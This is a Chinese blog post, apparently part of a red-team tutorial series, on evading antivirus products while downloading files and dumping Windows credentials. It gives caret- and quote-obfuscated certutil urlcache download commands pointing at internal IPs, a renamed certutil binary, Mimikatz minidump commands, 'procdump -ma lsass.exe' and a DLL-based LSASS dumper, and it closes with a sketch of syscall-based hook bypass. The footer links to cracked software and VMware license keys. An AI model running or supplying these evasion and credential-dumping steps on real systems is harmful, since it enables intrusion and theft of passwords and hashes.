免杀对抗-安全工具篇&动态绕过&DumpLsass凭据&Certutil下载&变异替换&打乱源头特征&SysCALL调用

Ethan医生4个月前工具131

 动态拦截-certutil绕过-源头特征混淆命令

 动态拦截-dumplsass绕过-源头特征混淆文件


 

#动态拦截-certutil绕过-源头特征混淆命令

Certutil是作为证书服务的一部分安装的命令行工具。

使用Certutil显示证书颁发机构 (CA) 配置信息、配置证书服务、备份和还原 CA 组件。Certutil命令中有个参数urlcache可以用于远程下载,直接运行指令会windows defender和大部分杀软查杀。一般解决无图像化下载上传文件操作等。

 

DF:

certutil -url""""cache -split -f http://192.168.1.4:81/1.txt

cert^u^t^il -url""""cache -sp""""lit -f http://192.168.1.4:81/1.txt

copy c:\windows\system32\certutil.exe c.exe

c.exe -url""""ca^c^he -spl""""it -f http://192.168.xx.xx:7070/test.txt

 

火绒:

copy c:\windows\system32\certutil.exe a.exe

a.exe -urlcache -split -f http://192.168.1.4:81/1.txt

 

X60:

打乱certutil文件属性,资源修改

123.exe -url""""cache -split -f http://192.168.1.4:81/1.txt

 

#动态拦截-dumplsass绕过-源头特征混淆文件

Dumplsass在内网安全测试中,成功导出获取口令或HASH起到了关键作用,各大杀毒也是对此进行各种拦截,如不能解决拦截将大大降低后续测试成功率。

 

0、Mimikatz离线

sekurlsa::minidump xx.log

sekurlsa::logonpasswords full

 

1、加载DLL

rundll32 dll.dll dllmain

具体代码实现思路:

-提升访问lsass.exe进程内存的权限

-获取lsass.exe进程的pid值

-创建文件来存储lsass.exe进程内存里面的内容

 

2、变异+加载Dll

rundll dll.dll dllmain

 

DF测试中发现生成但被杀(文件混淆下)

CallBackDump to

dumpXor xx.log xx.bin

https://github.com/seventeenman/CallBackDump

 

3、变异+白加黑DLL+SSP(X60)

参考:https://forum.butian.net/share/2434

 

4、一些冷门的项目

参考:https://mp.weixin.qq.com/s/LEYdM8Ulo93mYR4bydzxfw

procdump -accepteula -ma lsass.exe mm.dmp

https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

 图片


Intel的CPU将特权级别分为4个级别--从R0到R3,R0是系统核心态,在核心态运行,拥有最高权限;R1和R2运行的是设备驱动程序;R3是用户代码态,在用户态下运行,拥有最低权限,每一层支持访问本层以及权限更低层的数据。

#Syscall技术基础

参考:https://mp.weixin.qq.com/s/CGmBhAS0vWo9r5LJwLAEzg

 

#Syscall Bypass 杀软原理

如下图所示,当用户在运行Malware.exe时,系统会调用一些windows API,有些杀软就会hook系统所调用的API,但是最终我们调用的还是Ntxxx这个种函数,此时有些Ntxxx函数并没有被杀软 hook,因此可以Bypass 杀软。


相关文章

APP隐私合规

APP隐私合规

#隐私合规-判断规则&检测项目对象:APP 小程序等具体:后续APP安全课程资料参考:https://mp.weixin.qq.com/s/SfCIx0mNxn_PDfXP_5SfOQ检测项目...

VMware Workstation Pro(VM虚拟机) v17.6.3 激活密钥

VMware激活密钥(通用批量永久激活许可)17:JU090-6039P-08409-8J0QH-2YR7F22H2:ZA5RU-6FYD5-48EPY-3XXEE-PAUGD16:ZF3R0-FHE...

【免杀】-魔改冰蝎behinder

【免杀】-魔改冰蝎behinder

【免杀】-魔改冰蝎冰蝎特征冰蝎有两个特征,其中有两个强特征分别是 两个固定Accept和数据包一大堆加密冰蝎默认的加解密方式六种解决1:绕过识别(魔改打乱指纹信息)解决2:绕过查杀(新增加密...

解压缩软件Bandizip v7.37 正式版破解专业版

解压缩软件Bandizip v7.37 正式版破解专业版

Bandizip,免费解压缩软件,号称速度最快的压缩和解压缩文件管理器。支持多核快速压缩、快速拖放,可以创建带密码和多卷的压缩包,可以提取包括RAR/RAR5/7Z/ZIP在内30多种格式,支持Win...

免杀对抗-安全工具篇&MIMiKatz&提权EXP&非源码修改方式&PE转ShellCode& 融入加载

免杀对抗-安全工具篇&MIMiKatz&提权EXP&非源码修改方式&PE转ShellCode& 融入加载

首先,你需要分析:1、安全工具是否有源代码2、安全工具源代码逻辑复杂程度3、当前源代码你是否有能力修改其次,你需要考虑:1、无源码或无能力修改2、各种异常bug打包问题3、修改打包后效果也不太好故:1...

C2 (Command and Control) 产品概述

C2 (Command and Control) 产品是网络安全领域中用于指挥控制的框架或平台,主要用于渗透测试、红队演练和安全研究。以下是市面上常见的C2产品分类和代表工具:开源C2框架Cobalt...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。